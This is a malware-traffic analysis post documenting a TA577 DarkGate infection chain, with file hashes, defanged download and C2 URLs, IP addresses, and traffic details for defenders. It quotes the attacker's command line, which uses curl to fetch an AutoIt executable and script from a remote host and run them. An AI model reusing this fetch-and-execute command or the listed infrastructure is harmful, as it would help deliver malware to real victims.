Malware-Traffic-Analysis.net - 2023-10-13

2023-10-13 (FRIDAY) - TA577 DARKGATE INFECTION

NOTICE:

Of note, the zip archives on this page have been updated, and they now use the new password scheme. For the new password, see the "about" page of this website.

ASSOCIATED FILES:

2023-10-13-TA577-DarkGate-IOCs.txt.zip 1.7 kB (1,728 bytes)
2023-10-13-DarkGate-infection-traffic.pcap.zip 2.2 MB (2,235,624 bytes)
2023-10-13-TA577-DarkGate-malware-and-artifacts.zip 1.0 MB (1,036,609 bytes)

2023-10-13 (FRIDAY): TA577 DARKGATE INFECTION

REFERENCES:

- https://twitter.com/Cryptolaemus1/status/1712795493703491729
- https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_13.10.2023.txt

INFECTION CHAIN:

- link from email --> downloaded zip --> extracted .js --> .js retreives & runs autoit3.exe & .au3 script --> DarkGate C2

DOWNLOADED ZIP ARCHIVE AND EXTRACTED JS FILE:

- SHA256 hash: a83cf81aa22b1f453a9bfd0c1d29402b07e6efb86414a707d29442209caf6c89
- File size: 14,568 bytes
- Downloaded from: hxxps[:]//isoowac[.]com/gfie/?R=9028231 --> hxxps[:]//isoowac[.]com/gfie//?redir=1697208976
- File name: uh.zip
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File description: zip archive downloaded from link in email
- Note: random file name and hash each time this is downloaded from the original link

- SHA256 hash: 21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7
- File size: 36,367 bytes
- File name: De.js
- File type: ASCII text, with very long lines (12414), with CRLF, LF line terminators
- File description: Script file extracted from the above zip archive

COMMAND SCRIPT RUN BY ABOVE JS FILE (MANUALLY PARSED HERE):

  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\[username]\AppData\Local\Temp &
  curl -o Autoit3.exe hxxp[:]//whoernet[.]co[.]com:80 &
  curl -o imkvef.au3 hxxp[:]//whoernet[.]co[.]com:80/msikatqayts &
  Autoit3.exe imkvef.au3 

INITIAL FILES FOR THE INFECTION:

- SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
- File size: 893,608 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/
- File location: C:\Users\[username]\AppData\Local\Temp\Autoit3.exe
- File location: C:\ProgramData\fcbeckd\Autoit3.exe
- File type: PE32 executable (GUI) Intel 80386, for MS Windows
- File description: Copy of Autoit3.exe, version 3.3.14.5
- Note: This is not an inherently malicious file

- SHA256 hash: 7f78ffb9ab7c20714b03e1d58497182c700ad8bda9dfe2a0af39b470cdf39620
- File size: 113,625 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/msikatqayts
- File location: C:\Users\[username]\AppData\Local\Temp\imkvef.au3
- File location: C:\ProgramData\fcbeckd\fbcbaaf.au3
- File type: data
- File description: .au3 file run by Autoit3.exe for DarkGate infection

- SHA256 hash: 2aac9ce0afa3628a39946ffb61bf36d195cd478afc25ac0b67cafbf0ca071d99
- File size: 396,296 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/icumzj
- File type: data
- File description: XOR-encoded binary retrieved by .au3 file
- String used for XOR encoding: MwjGWzOH

- SHA256 hash: a1aec4ee66c9a6d87ffdb3fc93ee0becd586ebf4799497dd2159e1d122bb83fd
- File size: 396,288 bytes
- File name: 2023-10-13-decoded-EXE-retrieved-by-au3-script.bin
- File type: PE32 executable (GUI) Intel 80386, for MS Windows
- File description: Decoded EXE file from the above XOR-encoded binary

INFECTION TRAFFIC:

ZIP ARCHIVE DOWNLOAD:

- 63.250.38[.]3 port 443 - hxxps[:]//isoowac[.]com/gfie/?R=9028231
- 63.250.38[.]3 port 443 - hxxps[:]//isoowac[.]com/gfie//?redir=1697208976

DARKGATE LOADER INFECTION TRAFFIC:

- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /
- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /msikatqayts
- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /icumzj

POST-INFECTION DARKGATE C2 TRAFFIC:

- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - POST / HTTP/1.0 
- 212.113.118[.]178 port 8080 - attempted TCP connections

Click here to return to the main page.